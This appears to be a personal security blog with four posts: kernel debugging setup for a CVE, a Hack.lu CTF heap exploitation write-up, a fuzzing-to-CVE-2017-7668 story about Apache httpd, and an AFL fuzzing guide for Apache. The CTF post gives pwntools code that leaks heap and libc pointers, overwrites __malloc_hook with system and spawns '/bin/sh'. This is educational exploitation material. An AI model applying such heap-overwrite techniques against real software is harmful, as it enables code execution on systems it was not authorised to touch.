viernes, 29 de diciembre de 2017

Linux Kernel Debugging with VMWare Player Free

Intro

This post should be a short one in the sense that, it will only cover how to configure two Linux virtual machines, one the debug host and another one the debugee, under a Windows host.
The reason to do this post was encouraged due to not finding the right information (maybe my fault) to look at on my journey to analyse CVE-2017-1000112, and had to figure it out.

As a final note, this post means I am shifting a bit my research towards the Linux Kernel instead of desperately trying to find an exploitable user land heap vulnerability since, to easily exploit a vulnerability on the heap you either need:
  • No ASLR
  • A scripting environment
    • This happens mostly in browsers since we have JavaScript and the likes
  • Be so lucky that your heap corruption happens on a function pointer
    • and also have all the ROP Gadgets at hand
  • Be Chris Evans and be able to craft scriptless exploits

Credit where credit is due

This post is a "diversion" from the post Adapting the POC for CVE-2017-1000112 to Other Kernels. It is a good post in the sense that, it holds you by the hand and guides you through to set up the right version of the Kernel with the right code sources. This can be sometimes tedious to do so, mad props for doing it NeverEndingSecurity!

(useless) .vmx file

If you have done a bit of research before landing on this blog post, you might have already encountered the following options:
debugStub.listen.guest64 = "TRUE"
debugStub.listen.guest64.remote = "TRUE"
Such options are the ones that, regarding some sources on the interwebz or the VMWare OSDev Wiki, will enable you to debug your kernel over a network connection. This wasn't working for me at all, no matter which combinations of these would I add. Wild guess here: These options don't work on the Free Player Version.
But hey! do not worry if you still have no clue what I am talking about, you don't need these to debug your Kernel if you're reading this post :)

kgdb

This was another bit of a rabbit hole. It was caused due to trying to establish a connection through either TCP or UDP protocols for remote debugging.
At first, one would land (or I did land first) on the following resource: https://www.kernel.org/pub/linux/kernel/people/jwessel/kgdb/
Said resource is a bit scarce on documentation and it takes for granted you're a sysadmin of level 42 and not just someone with enough curiosity to debug a Kernel exploit.

kgdboe

"The term kgdboe is meant to stand for kgdb over ethernet. To use kgdboe, the ethernet driver must have implemented the NETPOLL API, and the kernel must be compiled with NETPOLL support. Also kgdboe uses unicast udp. This means your debug host needs to be on the same lan as the target system you wish to debug."
Ok so, kgdboe seems what I wanted. Now I needed to know if I had it enabled on the Kernels that I just installed. This can be done by checking on the modules folder:
ls -l /sys/modules/ | grep -i "kgdb"

It seems that I didn't have the kgdboe module loaded. For the sake of simplicity I am skipping the part on which I failed to compile the whole kernel with kgdboe and NETPOLL support.

kgdboc

I skipped it because something caught my attention. It was the presence of the kgdboc module:
The kgdboc driver was originally an abbreviation meant to stand for "kgdb over console". Kgdboc is designed to work with a single serial port. It was meant to cover the circumstance where you wanted to use a serial console as your primary console as well as using it to perform kernel debugging. Of course you can also use kgdboc without assigning a console to the same port.
That seems what I actually wanted to do: having a remote terminal debugging another host. No need for networking! Just some old school serial ports!

Serial ports on VMWare Player Free

Let's do it! Open VMWare Player and, on the settings of the debugging machine (the one that is going to connect to the remote debugger), we need to add a new device. A Serial Port just like in the following image:


There are some key points here on the right of the image. Since this is our debugging machine:
  • The name of the pipe should be the same for both machines
  • This is the debugger connecting to a remote target: This end is the client.
  • Of course, the other end is a Virtual Machine (VMWare will do its magic)
  • We are debugging, we need some kind of "sync" by consuming CPU: Polling

With this in mind, we can configure the debugged machine where our debugging server will be:


The only thing that is different on this configuration is the This end is the server setting.
We can now test our newly connected serial port:


Configuring kgdboc

One of the final steps we need to make is to tell kgdb which serial port to send and receive its debugging information from. There are two ways to configure this, on boot time (add the option on grub to our init line), or the one we are going to cover, which is writing to the module file on runtime. Remember the kgdboe section?
echo ttyS1,115200 > /sys/module/kgdboc/parameters/kgdboc
The really final step is to trigger a debugging interrupt to let the client attach to the remote debugger.

SysReq keys

The SysReq keys are still quite a magical thing to me. The use I make of them the most is rebooting a Linux hung up machine even when it all seems lost.
For our specific case, we are going to be looking at the SysReq Key "g":
If the in-kernel debugger kdb is present, enter the debugger.
In order to not have to activate all the SysReq requirements to be able to press the alt+SysReq+KEY combination every time I boot, I created a file named kgdb_commands. Such file contains:
echo ttyS1,115200 > /sys/module/kgdboc/parameters/kgdboc
echo g > /proc/sysrq-trigger
The first command we know, the second will trigger the "g" functionality and enter the debugger which is now configured to send the information to our /dev/ttyS1 serial port.
Bear in mind that these commands should be run as root!
sudo bash -f kgdb_commands
After doing so, on the client machine after loading gdb and our sources, we run:
target remote /dev/ttyS1


On the following image we can see the outcome of setting a breakpoint on a certain function as per the exploit:


Conclusion

Always go back in time and think: What would've a Sysadmin do 10 years ago? And for sure an answer will be there waiting for you. Be it in the way of Serial Ports, Terminals or SysReq keys!

Further References


sábado, 21 de octubre de 2017

Hack.lu - HeapHeaven write-up with radare2 and pwntools (ret2libc)

Intro

In the quest to do heap exploits, learning radare2 and the like, I got myself hooked into a CTF that caught my attention because of it having many exploitation challenges. This was the Hack.lu CTF:
Hack.lu challenges by FluxFingers
You can see from that list the Pwn category that there are a few ones so I tried not to overkill myself with difficulty and go for the easiest Heap one, HeapHeaven. As much as I wanted to try the HouseOfScepticism because of the resemblance with the Malloc Malleficarum techniques, when opening it on radare2, it looked quite a bit daunting: no symbols, tons of functions here and there and my inexperience on reading assembly. Another goal for this post is to make some kind of introduction to the usage of radare2. It's quite a good tool with tons of utilities inside such as ROP, search for strings, visual graphs, etc.

The analysis

heaps and pieces

For this challenge we are given (again) the libc.so.6 along the binary. If this is a good giveaway that we will have to do some jump to libc's functions to gain code execution. The binary itself is just an:

HeapHeaven: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, 
interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, 
BuildID[sha1]=617e9a6742b6537d6868f2f8355d64bea4316a99, not stripped

Cool! It's not stripped. This means that we have all the debugging symbols. First thing I did was throwing it into radare2 and check the functions from the menu we are presented with:
HeapHeaven menu

We can see that the functions should be something like "whaa!", "mommy?", etc.

Firing up the radar

We fire up radare2 against the HeapHeaven file like so:
$: radare2 HeapHeaven -AA
This will open the file and do an extensive analysis of it. For a quicker but less extensive analysis, we can just put one "A". Once the analysis is complete, we can head to the var code analysis menu by writing the command vv and pressing enter. If you haven't ever used radare2, you are wondering if all the commands are going to be like "aa" "vv" "cc". Well...

radare2 trolling

After typing in vv we are presented with the whole lot of functions resolved by radare2 due to the file not being stripped. Yay!
Non-stripped symbols on radare2

By inspecting the first function from the menu, namely "whaa!", we see a function parsing a number and then a call to malloc. Our intuition is telling us that this function will serve to allocate chunks of whichever size we specify and that, the other functions, will be doing all other heap manipulation. To prove this inside radare2, we browse with the arrow keys to the function we want and then press g to seek to that function position. Then press V (shift + "V") to go to the visual graph representation.
whaa! function representation
Watch out for the differences here vs x86 (32 bit). As we can see, the arguments aren't pushed to the stack like we are used to see on x86. On x86_64 we can see that the most common way is to pass the arguments in the registers, especially the RDI register. Something that doesn't change is how functions return their values, this is, into the RAX/EAX register. I am going to spoil the get_num function a bit and say that, it is actually not parsing a number. Let's see it in radare2. Again, seek to the function and press capital V:
 DIsassembly of get_num
It is clearly seen that the function is trying to read, through the scanf function, the format %255s and it will get stored on the argument pointed by the RAX register. In radare2, it's shown as local_110h which is then passed to parse_num.

Zoom out of parse_num function.

Here, thanks to the blue arrows that radare2 describes, we can observe that most likely there is some kind of loop logic happening. Since it is parsing a "number" and previously a string was scanf'ed, it would not be a bad assumption to think that it's parsing our string.

Prologue of parse_num function.
Indeed, the string is passed into RDI and then it's stored in a local variable local_18h. This is afterwards compared against certain bytes and the counter (local_ch) of the loop is incremented by 2. The operation done inside the loop is actually, "binary adding" through bitshifting with the shl opcode. Finally, the resulting operation is stored in another variable to be returned into RAX (local_8h).

Function parse_num comparing bytes.
I spent some time "deciphering" what this code was doing and reading about opcodes. If we watch closely, both are doing almost the same. The only difference is that the second is increasing by one the counter (rax + 1), and then accessing the byte to that offset of the array (mov rax, qword [local_18h]; add rax, rdx; movzx eax, byte [rax]) to compare it against he byte 0x69 (letter "i"). Something that would help us at this point is, renaming the variables to something more user friendly. In radare2, we can do this by seeking to the offset of the function we want to with:

[0x00000b8d]> s sym.parse_num 
[0x000009ca]> afvn local_ch counter_int
[0x000009ca]> afvn local_18h arg_string
[0x000009ca]> afvn local_8h result

Second part of parse_num function with renamed variables.

This is now quite clearer, isn't it? Basically, it is being compared against the bytes 0x77, 0x69 and 0x61. If it's 0x77 (letter "w"), it will jump to the next char and check if it's 0x69 or 0x61 (letter "a"). If the next char is "i", it will add one to the result. Else, if the char is "a", it will just increase the counter and keep parsing. See the translation? We are feeding binary numbers as toddlers (regarding FluxFingers) speak, "wi" being 1 and "wa" being 0.

The exploit

Having the following functions:

whaa!: Allocates chunks of a specified size.
mommy?: Reads a string from a specified offset.
<spill>: Writes to an specified offset.
NOM-NOM: Free's a pointer at an specified offset.

Here's what we need to do.
  1. Leak top and heap pointers
  2. Calculate the offset to __malloc_hook
  3. Calculate the offset to system
  4. Write the address of system into __malloc_hook
  5. Call system with "/bin/sh" as an argument

babbling comprehensively

To code the solution I relied heavily on pwntools by Zach Riggle. The library is just great. I started writing a function that will translate an hex number to a comprehensive babbling ("wiwawiwa" like).

...
def translate_baby(size):
    wiwa = ""
    for bit in ("%s" % "{0:b}".format(size)):
        if bit == "1":
            wiwa += "wi"
        else:
            wiwa += "wa"
    return ("%s" % (wiwa+"0"*(254-len(wiwa))))
...

I am padding the string with zeroes to the right. This is because the scanf tries to read %255s and, the loop, won't stop until the counter reaches 0x3f. This would cause trouble because if we don't pad enough chars to the right, the parse_num function will keep reading values from memory and, in case there is another "wiwa" around there, it will mess up our calculations #truestory.

leaking addresses

From the Painless intro to ptmalloc2, we remember that a normal chunk had the following structure:

 +---------------------------------+-+-+-+
 | CHUNK SIZE                      |A|M|P|
 +---------------------------------+-+-+-+ 
 |           FORWARD POINTER(FD)         |
 |            BACK POINTER(BK)           |
 |                                       | 
 |                                       |
 | -  -  -  -  -  -  -  -  -  -  -  -  - |
 |         PREV_SIZE OR USER DATA        |
 +---------------------------------------+

The FD pointer is set to, either the top chunk pointer if it's the only chunk free of that size or, to the next free chunk of the same size if there are more chunks free'd afterwards. Since we can read from a certain offset, we are able to trigger allocations and free's to set  top and FD pointers to then, read those:
...
    # Alocate four chunks so we can avoid coalescing chunks and leak:
    # * Pointer to chunk2 
    # * Pointer to main_arena+88 (av->top)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)

    # Now free chunks 2 and 4 in that order so we can access their FD
    # The first free'd chunk's FD will point to main_arena->top
    # The second free'd chunk's FD will point to the second chunk
    free_chunk(0x20, io)
    free_chunk(0x280, io)

    # Read the FD pointers and store them to calculate offsets to libc
    main_arena_leak = read_from(0x20, io)
    print("[+] Main_arena: %#x" % main_arena_leak)
    heap_2nd_chunk = read_from(0x280, io)
    print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...

I am not going to cover why or where those pointers are set since I think I have covered this matter extensively on previous heap posts (don't be lazy, read them!). However, it's mandatory to explain why we need to free the offset to 0x20 and the offset to 0x280. When the program starts, it triggers a malloc(0x0) which, in turn, reserves 32 bytes (0x20 in hex) in memory. As you may remember, fastchunks only set their FD pointer (fastbins are single linked lists), hence jumping over the first fastchunk and going straight to free the next chunk of size 0x130 in memory (we allocated 0x130-0x8 in order to trigger an effective allocation of 0x130 in memory). This will set its FD and BK pointers to the top chunk in main_arena.
Function parse_num comparing bytes.

Now we free the fourth chunk in order to populate it's FD pointer and make it point to the first free'd chunk. See how the FD pointer is pointing to the previous free'd chunk 0x55cd4bd8020.

Status of the fourth chunk after the second free
We are ready to leak the addresses now. The only thing we need to do is call the menu function "mommy?" and feed it the previous offsets:

...
    # Read the FD pointers and store them to calculate offsets to libc
    main_arena_leak = read_from(0x20, io)
    print("[+] Main_arena: %#x" % main_arena_leak)
    heap_2nd_chunk = read_from(0x280, io)
    print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...

Return to libc (ret2libc)

After leaking both addresses, one to the heap and another one inside main_arena we have effectively bypassed ASLR. The main_arena is always placed at a fixed relative position from the other functions of the libc library. After all, the heap is implemented inside libc. To obtain the offsets to other functions we can just query inside gdb and then move the offsets depending on the libc we are targeting.

Calculating offsets within gdb
Let's start assigning all of this inside our exploit code:

...
    # Offset calculation
    happa_at = heap_2nd_chunk - 0x10
    malloc_hook_at = main_arena_leak - 0x68
    malloc_hook_offset = malloc_hook_at - happa_at
    libc_system = malloc_hook_at - 0x37f780
...

The variable happa_at is the address of the base of the heap. This is, the first allocated chunk of them all. malloc_hook_at represents the absolute address of the weak pointer __malloc_hook. We are using this hook to calculate offsets instead of the top chunk (there is no special reason for this). Finally, the system symbol is calculated and stored into the libc_system variable. We need happa_at because when using the "<spill>" function, we have to provide as the first argument an offset (not an address!). This offset starts from the base of the heap (namely, happa_at). Then, we provide the string we want to write at that offset. Our goal is to write at __malloc_hook the address of system. There are several techniques like creating fake FILE structures, overwriting malloc hooking functions or going after the dtors. All of this in order to redirect code execution. I chose this one since it's the one I feel is simpler enough and it is so convenient as the function we place in __malloc_hook must take the form of malloc. This means that the function we place in there must take an argument just as malloc, so system fits so well.

wiwapwn

Having in mind that __malloc_hook only gets triggered when an allocation happens and, that the argument to malloc is passed onto __malloc_hook therefore passed onto system. This means that the last malloc we trigger, needs to have a pointer to the string "/bin/sh\x00". We can satisfy this by writing the string to any of the chunks already allocated and then, feed the pointer to that chunk's position. I've chosen the first allocated chunk at offset 0x0, this is, the pointer pointed by happa_at:
...
    # write /bin/sh to the first chunk (pointed by happa_at)
    write_to(0x0, io, "/bin/sh\x00")
...
Since we have calculated the offsets to all that we need let's overwrite the pointer of __malloc_hook with the pointer to system:

...
    # Write the address of system at __malloc_hook
    write_to(malloc_hook_offset, io, p64(libc_system))
...

All we need to do now is trigger __malloc_hook with the address of "/bin/sh\x00" as an argument and interact with the shell:

...
    # Call malloc and feed it the argument of /bin/sh which is at happa_at
    # This will trigger __malloc_hook((char*)"/bin/sh") and give us shell :)
    allocate_chunk(happa_at, io)
...

Exploit for HeapHeaven

Final notes

Note that I didn't need to change any offsets to system's libc to exploit the remote system. This was because the system I used to build the exploit had the same libc. In case we don't have the same libc and we are provided with such what we need to do is, calculate the base of libc through leaked pointers and then, add offsets like such:

Exploit for HeapHeaven
Then, in our code we would have:

libc_system = calculated_libc_base + 0x45390

As a final note. This blog was actually published in my actual company's internal blog that I decided to also make it public through my blog since I don't think write-ups are SensePost's-blog-worthy.

I hope you enjoyed this write-up as much as I enjoyed solving this challenge! You can get the full HeapHeaven exploit code here.

domingo, 16 de julio de 2017

From fuzzing Apache httpd server to CVE-2017-7668 and a $1500 bounty

Intro

In the previous post I thoroughly described how to fuzz Apache's httpd server with American Fuzzy Lop. After writing that post and, to my surprise, got a few crashing test cases. I say "to my surprise" because anybody who managed to get some good test cases could have done it before me and, despite of it, I was the first in reporting such vulnerability. So here's the blog of it!

Goal

After seeing Apache httpd server crashing under AFL, lots of problems arise such as, the crashing tests doesn't crash outside of the fuzzer, the stability of the fuzzed program goes way down, etc. In this blog post we will try to give an explanation to such happenings while showing how to get the bug and, finally, we will shed some light on the crash itself.

Takeaways for the reader

  • Testcases scraped from wikipedia
  • Bash-fu Taos
  • Valgrind for triage
  • Valgrind + gdb: Learn to not always trust Valgrind
  • rr

The test cases

Since this was just a testing case for myself to fuzz network based programs with AFL, I did not bother too much on getting complex or test cases that had a lot of coverage.
So, in order to get a few test cases that would cover a fair amount of a vanilla installation of Apache's httpd server, I decided to look up an easy way to scrape all the headers from the List of headers - WIki Page.

Bash-fu Tao 1: Butterfly knife cut

The first thing I did is just copy paste the two tables under Request Fields into a text file with your editor of choice. It is important that your editor of choice doesn't replace tabs for spaces or the cut command will lose all its power. I chose my file to be called "wiki-http-headers" and after populating it, we select the third column of the tables we can do the following. Remember that the default delimiter for cut is the TAB character:

cat wiki-http-headers | cut -f3 | grep ":" | sed "s#Example....##g" | sort -u

We can see that some headers are gone such as the TSV header. I ignored such and went on to fuzzing since coverage was not my concern - the real goal was to fuzz. Maybe you can find new 0-days with the missing headers! Why not? ;)

Bash-fu Tao 2: Chain punching with "for"

Now that we have learned our first Tao, it is time to iterate on each header and create a test case per line. Avid bash users will already know how to do this but for these newcomers and also learners here's how:

a=0 && IFS=$'\n' && for header in $(cat wiki-http-headers | cut -f3 | grep ":" | sort -u); do echo -e "GET / HTTP/1.0\r\n$header\r\n\r\n" > "testcase$a.req";a=$(($a+1)); done && unset IFS

Let me explain such an abomination quickly. There is a thing called the Internal Field Separator (IFS) which is an environment variable holding the tokens that delimit fields in bash. The IFS by default in bash considers the space, the tab and the newline. Those separators will interfere with headers when encountering spaces because the for command in bash iterates over a given list of fileds (fields are separated by the IFS) - this is why we need to set the IFS to just the newline. Now we are ready to just iterate and echo each header to a different file (the a variable helps to dump each header to a file with a different name).

Bash-fu Tao Video

Here is one way to approach the full bash-fu Taos:

The fuzzing

Now that we have gathered a fair amount of (rather basic) test cases we can start now our fuzzing sessions. This section is fairly short as everything on how to fuzz Apache httpd is explained in the previous post. However, there minimal steps are:
  1. Download apr, apr-utils, nghttpd2, pcre-8 and Apache httpd 2.4.25
  2. Install the following dependencies:
    1. sudo apt install pkg-config
    2. sudo apt install libssl-dev
  3. Patch Apache httpd
  4. Compile with the appropriate flags and installation path (PREFIX environment variable)
Now it all should be ready and set up to start fuzzing Apache httpd. As you can see in the following video, with a bit of improved test cases the crash doesn't take long to come up:

It is worth mentioning that I cheated for this demo a bit as I introduced already a test case I knew it would make it crash "soon". How I obtained the crashing testcase was through a combination of honggfuzz, radamsa and AFL while checking the stability + "variable behaviour" folder of AFL.

The crashing

Dissapointment

First things first. When having a crashing test case it is mandatory to test if it is a false positive or not, right? Let's try it:
Euh... it doesn't crash outside Apache. What could be happening?

Troubleshooting

There are a few things to test against here...

- First of all we are fuzzing in persistent mode:
This means that maybe our test case did make the program crash but that it was one of many. In our case the __AFL_LOOP variable was set to over 9000 (a bit too much to be honest). For those that don't know what said variable is for, it is the number of fuzzing iterations that AFL will run before restarting the whole process. So, in the end, the crashing test case AFL discovered, would need to be launched in a worst case scenario, as follows: Launch all other non-crashing 8999 inputs and then launch the crashing one (i.e. the last test case) number 9000.

- The second thing to take into account is the stability that AFL reports:
The stability keeps going lower and lower. Usually (if you have read the readme from AFL you can skip this part) low stability could be to either, use of random values (or use of date functions, hint hint) in your code or usage of uninitialised memory. This is key to our bug.

- The third and last (and least in our case) would be the memory assigned to our fuzzed process:
In this case the memory is unlimited as we are running afl with "-m none" but in other cases it can be an indicator of overflows (stack or heap based) and access to unallocated memory.

Narrowing down the 9000

To test against our first assumption we need more crashing cases. To do so we just need to run AFL with our "crashing" test case only. It will take no time to find new paths/crashes which will help us narrow down our over 9000 inputs to a much lower value.

Now, onto our second assumption...

Relationship goals: Stability

When fuzzing, we could check that stability was going down as soon as AFL was getting more and more into crashing test cases - we can tell there is some kind of correlation between the crashes and memory. To test if we are actually using uninitialised memory we can use a very handy tool called...

Valgrind

Valgrind is composed by a set of instrumentation tools to do dynamic analysis of your programs. By default, it is set to run "memcheck", a tool to inspect memory management.
To install Valgrind on my Debian 8 I just needed to install it straight from the repositories:
sudo apt install valgrind
After doing that we need to run Apache server under Valgrind with:
NO_FUZZ=1 valgrind -- /usr/local/apache-afl-persist/bin/httpd -X
The NO_FUZZ environment variable is read by the code in the patch to prevent the fuzzing loop to kick in. After this we need to launch one of our "crashing" test cases into Apache server running under Valgrind and, hopefully, our second assumption about usage of uninitialised memory will be confirmed:

We can confirm that, yes, Apache httpd is making use of uninitialised values but, still... I wasn't happy that Apache won't crash so let's use our Bash-fu Tao 2 to iterate over each test case and launch it against Apache.

Good good, it's crashing now! We can now proceed to do some basic triage.

The triage

Let's do a quick analysis and see which (spoiler) header is the guilty one...

gdb + valgrind

One cool feature about valgrind is that, it will let you analyse the state of the of the program when an error occurs. We can do this through the --vgdb-error=1 flag. This flag will tell valgrind to stop execution on the first error reported and will wait for a debugger to attach to it. This is perfect for our case since it seems that we are accessing uninitialised values and accessing values outside of a buffer (out-of-bounds read) which is not a segfault but it still is an error under valgrind.
To use this feature, first we need to run in one shell:
NO_FUZZ=1 valgrind --vgdb-error=0 -- /usr/local/apache_afl_blogpost/bin/httpd -X
Then, in a second separate shell, we send our input that triggers the bug:
cat crashing-testcase.req | nc localhost 8080
Finally, in a third shell, we run gdb and attach through valgrind's command:
target remote | /usr/lib/valgrind/../../bin/vgdb
We are now inspecting what is happening inside Apache at the exact point of the error:

Figure 1 - Inspecting on first valgrind reported error.

As you can see the first reported error is on line 1693. Our intuition tells us it is going to be the variable s as it is being increased without any "proper" checks, apart from the *s instruction, which will be true unless it points to a null value. Since s is optimised out at compile time, we need to dive into the backtrace by going up one level and inspecting the conn variable which is the one that s will point to. It is left as an exercise for the reader as to why the backtrace shown by pwndbg is different than the one shown by the "bt" command.
For the next figures, keep in mind the 2 highlighted values on Figure 1: 0x6e2990c and 8749.


Here is where, for our analysis, the number from Figure 1, 8749, makes sense as we can see that the variable conn is allocated with 8192 bytes at 0x6e2990c. We can tell that something is wrong as 8749 is way far from the allocated 8192 bytes.


This is how we calculated the previous 8749 bytes. We stepped into the next error reported by valgrind through issuing the gdb "continue" command and letting it error out. There was an invalid read at 0x6e2bb39 and the initial pointer to the "conn" variable was at 0x6e2990c. Remember that s is optimized out so we need to do some math here as we can't get the real pointer from s on debugging time. Said this, we need to get the offset with:
invalid_read_offset = valgrind_error_pointer - conn
which is:
8749 = 0x6e2bb39 - 0x6e2990c

rr - Record & Replay Framework

During the process of the triage, one can find several happenings that can hinder the debugging process: Apache will stop out of nowhere (haven't managed to get the reason why), valgrind will make it crash on parts that it is not supposed to because of it adding its own function wrappers, the heap will be different on valgrind debugging sessions than plain gdb or vanilla runs, etc.
Here is where the Record & Replay Framework comes in handy: Deterministic replaying of the program's state. You can even Replay the execution backwards which, in our case, is totally awesome! Must say I discovered this tool thanks to a good friend and colleague of mine, Symeon Paraschoudis, who introduced this marvellous piece of software to me.
Let's cause the segmentation fault while recording with rr and replay the execution:

Full analysis is not provided as it is outside of the scope of this post.

Conclusions

We have learned how to use bash to effectively scrape stuff as test cases from the web and to believe that, even thought hundreds of people might be fuzzing a certain piece of software, we can still add our value when using the right combination of tools, mutations and knowledge.
Tools have been discovered along the way that will aid and help further triage.

Stay tuned for the search of animal 0day! Cross-posts from the SensePost blog upcoming with challenges on heap-exploitation!

Post-Scriptum

I am willing to donate the 1500$ bounty I received from the Internet Bug Bounty to any organisation related to kids schooling and, especially, those teaching and providing means regarding Information Technologies. Knowledge is Power! So tune in and leave your suggestions in the comment section below; I have thought of ComputerAid, any opinions on this?

domingo, 7 de mayo de 2017

Fuzzing Apache httpd server with American Fuzzy Lop + persistent mode

Intro


Goal

When stumbling upon the great American Fuzzy Lop and trying its awesome deterministic fuzzing capabilities and instrumentation soon we find out that this fuzzer was built to fuzz programs that take input from the command line (or standard input)  instead of a network socket. Because of that, I thought I would give it a try and make AFL fuzz against Apache's httpd server. First the AFL way by adding a new option to Apache's command line and the second way, by using the persistence fuzzing (afl-clang-fast) by shamelessly copying the way Robert Swiecky fuzzes Apache with honggfuzz.

Takeaways for the reader

  • Learn to fuzz network based programs with AFL
  • Code to start fuzzing Apache with AFL in no time
  • Testcases scrapped from wikipedia
  • A push in the interwebz fuzzing race
Let's do it!

Setup part 1

I will be using a Debian GNU/Linux 8 64bit with the kernel 4.9.0-0.bpo.2-rt-amd64. You don't really need that setup, this can be done on Ubuntu as well. All that you need is an operating system (under a virtual machine or not) that can compile and run AFL with the afl-clang feature.

But, before getting into any compilations/installations/fuzzing, I encourage you to set an organised folder structure that suits you best but, in case you haven't got one already, I am sharing mine.
Under the Fuzzing folder I have:
  • Victims - For the target programs that we are about to fuzz
  • Fuzzers - AFL, honggfuzz, radamsa, etc. go here
  • Testcases  - The samples we are going to feed the fuzzer to throw against our Victim
  • Sessions - For storing the fuzzing sessions
  • Compilers - To store compilers such as clang-4.0 and binaries needed to compile

Getting clang-4.0 and llvm-tools

Getting pre-built binaries for clang-4.0 and the llvm-tools is fairly easy if you have Debian or Ubuntu. You can get these from here http://releases.llvm.org/download.html. In my case the clang+llvm-4.0.0-x86_64-linux-gnu-debian8.tar.xz tarball.
If you are following the structure mentioned above, you can cd into your Compilers folder and drop the tarball there, extract it and then add the binaries folder to your path by adding the following line to the end of your ~/.bashrc file (~/.profile nor /etc/environment worked for me - It seems that you need to logout and login for these changes to take place).
PATH="$HOME/Fuzzing/Compilers/clang+llvm-4.0.0-x86_64-linux-gnu-debian8/bin:$PATH"
Now issuing the which command on a new shell we should have the following output:
which clang
/home/javier/Fuzzing/Compilers/llvm-clang-binaries/clang+llvm-4.0.0-x86_64-linux-gnu-debian8/bin/clang

Compiling and Installing AFL

Compiling AFL should be pretty straight forward but, for the lazy, you can just copy paste these commands and you should be ready to go:
sudo apt install build-essential
wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
tar -xzf afl-latest.tgz
cd afl*
make && sudo make install && 
echo -e "\n[+] AFL ready to fuzz at $(which afl-fuzz)"

That's it, the binary afl-fuzz should be in your path now ready to be unleashed.

Compiling and installing Apache

First move to a folder where we are about to download all the dependencies needed by Apache and apache itself. In my case the folder is at ~/Fuzzing/Victims/apache_afl/.

Before compiling Apache we are going to need the Apache Portable Runtime (APR), APR Utils and support for HTTP/2 through nghttp2.
No lazyness this time, go download:
Now we need to get the latest Apache build, which I recommend you do from their subversion repository by doing so:
sudo apt install subversion
svn checkout http://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x httpd-2.4.x
Now if you downloaded and unpacked everything, you should have a similiar output from ls -l command:
drwxr-xr-x 28 javier javier  4096 Apr  9 23:12 apr-1.5.2
drwxr-xr-x 20 javier javier  4096 Apr  9 23:13 apr-util-1.5.4
-rwxr-xr-x  1 javier javier  1445 May  6 20:56 compile_httpd_with_flags.sh
drwxr-xr-x 11 javier javier  4096 Apr 29 01:22 httpd-2.4.x
drwxr-xr-x 14 javier javier  4096 Apr  9 23:14 nghttp2-1.21.0
drwxr-xr-x  9 javier javier 12288 Apr  9 22:53 pcre-8.40

I made the following file to compile and link it all since I found myself often changing flags for the compiler and it was too time consuming compiling each dependency one by one with its own flags. Get it with:
wget https://gist.githubusercontent.com/n30m1nd/14418fd425a3b2d14b64650710fae301/raw/e1cff738eb1ffaa55cb8a1a66bb1a2b06ed7f97e/compile_httpd_with_flags.sh

Before editing any files yet lets run the bash script and see that we can compile everything cleanly without any missing dependencies whatsoever:

CC="clang" CXX="clang++" PREFIX="/usr/local/apache_clean_test/" ./compile_httpd_with_flags.sh
Please see the next asciinema for reference of a nice compilation run.

Fuzzing Apache with AFL through an input file

As you might know by now, AFL in its basic usage feeds a file into the target program through its "argv" array in the following form:
afl-fuzz -i testcases/ -o session_1/ -m none -t 2000 -- ./victim -d -v -f @@
The problem with Apache is that it doesn't have such functionality so we will have to patch it our own way.

Patching Apache ... Apatching

Taking into account the aforementioned problem, we need to write some lines into Apache's main.c file to make it able to read files from input.
You can patch Apache with the following patch file here. Now apply it by cd'ing into the base path of Apache httpd's source code and issuing the following command:
patch -p0 -i apatching_apache_for_AFL_fuzzing.diff
I am not going to cover all the patch in detail but some parts are worth mentioning.

The first and only time that I have seen the following technique was by Robert Swiecky, an information security researcher at Google when fuzzing Apache with honggfuzz. It is pretty clever and pretty obvious once you see the way it is done. It basically consists of launching a new thread inside Apache that will create a connection to the web server itself and send our fuzzed input;  all happening within the same unique process so we can get all the instrumentation data into AFL. Clever! Right?
To achieve this it uses the unshare function that disassociates parts of this thread's context from the others without the need of creating a new process. Specifically, the network and  mount namespaces are separated. This is done so we can have several processes with the same settings (listening on the same loopback interface and port with the help of netIfaceUp on line 44 of the patch file and writing logs to /tmp on line 75) running at the same time on each process we launch.

We can see that the unshare function is indirectly called on line 188 previous to firing the new thread that will receive the fuzzed input at line 189.

The process of reading a file through the "-F" switch starts on line 156 and when the file is read into a buffer, this buffer is passed onto the function responsible to launch the new thread (189) that will, in turn, send the fuzzed file inside the SENDFILE function on line 119.

Fuzzing Apache ... Fapache

Yes! We are ready now! Let's compile Apache:
CC="afl-clang" CXX="afl-clang++" PREFIX="/usr/local/apache_afl_blogpost/" ./compile_httpd_with_flags.sh
If you are familiar with AFL and how it works you probably have your own testcases to feed it with, in case you don't the following video shows how to launch AFL and create two very simple test cases - remember that we need to be root in order to use the unshare function AND MORE IMPORTANT TO LAUNCH APACHE WITH THE "-X" FLAG AND "-m none -t 5000" FOR AFL SO IT CAN BOOT APACHE:
Well, that was not too fast, was it? 5 execs per second on my laptop... how can we speed things up a bit?

Setup part 2

Compiling afl-clang-fast

Remember we downloaded clang-4.0 and the llvm-tools before and set it in our path? This is where it comes most handy. Inside your AFL folder, navigate to the llvm_mode and run make and sudo make install in the root folder of AFL. What we have just done is compiling an experimental feature of AFL that will run a certain number of fuzzed inputs against a program without having to run the whole program per fuzzing input.

Patching Apache with Persistence ... Apatchistence

Following the same dance as before, download this patch, patch it and ready to fuzz!

Fuzzing Apache with AFL on Persistent mode

Let the video speak for itself but again remember the previously mentioned "-X" flag for Apache server and the "-m none -t 5000" flags for AFL

Update:

As pointed by Robert himself, you don't need to run everything as root as I did in the examples which, obviously imposes security risks. You can make use of the following command line (this one to be run as root :P) to let non-root users make use of the unshare function:
sysctl -w kernel.unprivileged_userns_clone=1

Conclusions

We have learned how to effectively fuzz server programs such as web servers by using Robert's technique of launching a different thread and different context through the unshare function.
While relatively fast, it is not as fast as honggfuzz, which can go up to 20k iterations per second with 8 processes running. Also after a few days of fuzzing AFL's stability goes way down 50% because of the multithreading that Apache is implemented on and so, any reported crashes, can be false positives or would either be needing the last iterations launched which AFL lacks of.

It is left as an exercise to the reader to implement into Apache a way to save the last 1k sent inputs into a file and to think which other ways would improve stability and/or speed. Hint: Don't instrument everything.

